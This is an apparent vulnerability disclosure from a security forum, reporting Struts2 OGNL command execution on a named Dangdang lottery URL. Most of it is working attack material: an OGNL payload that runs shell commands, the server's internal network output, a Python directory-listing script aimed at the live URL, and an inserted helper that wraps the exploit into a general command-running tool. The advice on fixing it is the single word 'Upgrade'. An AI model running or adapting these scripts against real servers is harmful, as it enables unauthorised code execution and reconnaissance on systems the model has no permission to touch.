HanDs
Administrator

[July vulnerability disclosure] Just an Artifact: Struts2 command execution on a Dangdang site (filter bypass)



With the artifact in hand, the world is mine.

Details:

I earned tangyuan (TangScan credits) by submitting plugins to TangScan, spent them on another plugin, and it scanned up a Struts2 command execution on a Dangdang site:

1.png

Vulnerable URL: http://caipiao.dangdang.com/cbportal/usercenter/hemai.htm

There should be some protection or filtering here; the previous payloads no longer work.

Test payload:

2.png

3.png


Directory listing:

4.png

5.png


Command execution:

6.png

7.png


Decoded ifconfig output:

Code:
eth0      Link encap:Ethernet  HWaddr 90:B1:1C:4C:A9:F2
          inet addr:192.168.1.203  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::92b1:1cff:fe4c:a9f2/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3425084210 errors:0 dropped:15 overruns:0 frame:4604
          TX packets:2920393573 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2642679068898 (2.4 TiB)  TX bytes:1537753012738 (1.3 TiB)
          Interrupt:194 Memory:d91a0000-d91b0000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:910780964 errors:0 dropped:0 overruns:0 frame:0
          TX packets:910780964 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:484110986527 (450.8 GiB)  TX bytes:484110986527 (450.8 GiB)

virbr0    Link encap:Ethernet  HWaddr 00:00:00:00:00:00
          inet addr:192.168.122.1  Bcast:192.168.122.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:26 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 b)  TX bytes:4022 (3.9 KiB)


This confirms the vulnerability exists; I did not go any further. The command execution payload is attached below:

Code:
${"~["+new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.ProcessBuilder(new java.lang.String[]{'/bin/sh','-c','ifconfig|base64 -w 0'}).start().getInputStream())).readLine()+"]~"}
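Added example, not the poster's code: the payload above only shows the OGNL expression, and the directory-listing script further down shows the transport. The helper below ties the two together the way a tester would use them: it puts the `redirect:`-prefixed OGNL into the name of a multipart form part (the `redirect:` prefix pattern known from S2-016), refuses to follow the redirect because the evaluated expression lands in the redirect target, pulls the `~[...]~` marker out of headers plus body, and base64-decodes it (the payload pipes through `base64 -w 0` so `readLine()` gets the whole output on one line). The boundary and marker convention are taken from the post; the `Mozilla/5.0` User-Agent, the `example.invalid` host and the sample response are constructed for the example, and `run_command()` is the only part that touches the network.

```python
"""Wrap the Struts2 `redirect:` OGNL payload in a multipart request and
decode the base64-wrapped command output. Added example, not the original
post's code."""
import base64
import re
import urllib.error
import urllib.request

# Same boundary and ~[ ]~ marker convention as the post's listing script.
BOUNDARY = "289b3f46292c4eee95g3f64e37d6f4dc"
MARKER = re.compile(r"~\[(.*?)\]~", re.S)


def ognl_exec_expr(command):
    """OGNL that runs `command` via /bin/sh -c and returns the first stdout
    line wrapped in ~[ ]~. `base64 -w 0` keeps the output on a single line so
    readLine() returns all of it and no newline ends up in the redirect."""
    # The shell string sits inside single-quoted OGNL literals and a ${...}
    # expression; a quote or brace in the command would break it, so refuse.
    if any(c in command for c in "'{}"):
        raise ValueError("command must not contain ' { or }")
    shell = command + "|base64 -w 0"
    return ('${"~["+new java.io.BufferedReader(new java.io.InputStreamReader('
            "new java.lang.ProcessBuilder(new java.lang.String[]{'/bin/sh','-c','"
            + shell + "'}).start().getInputStream())).readLine()+\"]~\"}")


def build_request(expr):
    """Multipart body whose single part is named `redirect:/<expr>`; the
    part *name*, not its value, carries the OGNL, as in the post's script."""
    body = ("--%s\r\n"
            'Content-Disposition: form-data; name="redirect:/%s"\r\n\r\n'
            "10498\r\n"
            "--%s--") % (BOUNDARY, expr, BOUNDARY)
    headers = {
        "Content-Type": "multipart/form-data; boundary=%s" % BOUNDARY,
        "User-Agent": "Mozilla/5.0",  # assumed UA, any value works
    }
    return headers, body.encode("utf-8")


def extract_result(text):
    """Return the contents of the first ~[...]~ marker in `text`, or None."""
    m = MARKER.search(text)
    return m.group(1) if m else None


def decode_output(b64):
    return base64.b64decode(b64).decode("utf-8", "replace")


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow the redirect: the evaluated expression is the redirect
    target, which is why the post's script used allow_redirects=False."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def run_command(url, command, timeout=5):
    """POST the payload to `url` and return the decoded output, or None."""
    headers, body = build_request(ognl_exec_expr(command))
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    try:
        resp = urllib.request.build_opener(_NoRedirect).open(req, timeout=timeout)
    except urllib.error.HTTPError as err:  # with redirects off, a 3xx is raised
        resp = err
    # Search headers (Location) and body alike; servers differ in where the
    # redirect target shows up.
    text = str(resp.headers) + "\r\n" + resp.read().decode("utf-8", "replace")
    found = extract_result(text)
    return decode_output(found) if found else None


# Constructed sample of the joined headers/body of an unfollowed redirect;
# "cm9vdA==" is base64 for "root". The host is a placeholder.
SAMPLE_RESPONSE = "Location: http://example.invalid/~[cm9vdA==]~\r\n\r\n"


def demo():
    """Parse the constructed sample instead of a live target."""
    return decode_output(extract_result(SAMPLE_RESPONSE))


if __name__ == "__main__":
    print(demo())
```

`run_command(url, "id")` returns the decoded first line of output or None when no marker comes back, which is also what happens once the application is upgraded to a Struts 2 release that no longer honours the `redirect:` prefix.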





Directory listing script:

Code:
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import re
import requests

path = '/usr/local/bea/'  # directory to list
url = "http://caipiao.dangdang.com/cbportal/usercenter/hemai.htm"  # vulnerable URL
# The OGNL goes into the multipart part *name* (redirect:/${...}); each request
# returns one listFiles() entry, wrapped in ~[ ]~ so it can be pulled out by regex.
data = """--289b3f46292c4eee95g3f64e37d6f4dc\r\nContent-Disposition: form-data; name="redirect:/${"~["+new java.io.File("%s").listFiles()[%s]+"]~"}"\r\n\r\n10498\r\n--289b3f46292c4eee95g3f64e37d6f4dc--"""
try:
    headers = {
        'Content-Type': 'multipart/form-data; boundary=289b3f46292c4eee95g3f64e37d6f4dc',
        'User-Agent': 'Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9'
    }
    for x in range(0, 400):
        # Do not follow the redirect: the evaluated expression is the redirect target.
        response = requests.post(url, data=data % (path, str(x)), headers=headers, timeout=5, verify=False, allow_redirects=False)
        result = re.findall(r'~\[(.*?)\]~', response.text, re.S | re.I)
        if len(result) != 0:
            print(result[0])
        else:
            # An out-of-range index produces no marker: end of the listing.
            print("Result End.....")
            break
except Exception as e:
    print(str(e))



Proof of vulnerability:

Directory listing:

4.png

5.png

Command execution:

6.png

7.png

8.png

Fix:

Upgrade.


Posted: 2016-7-18   |   Views: 0   |   Replies: 0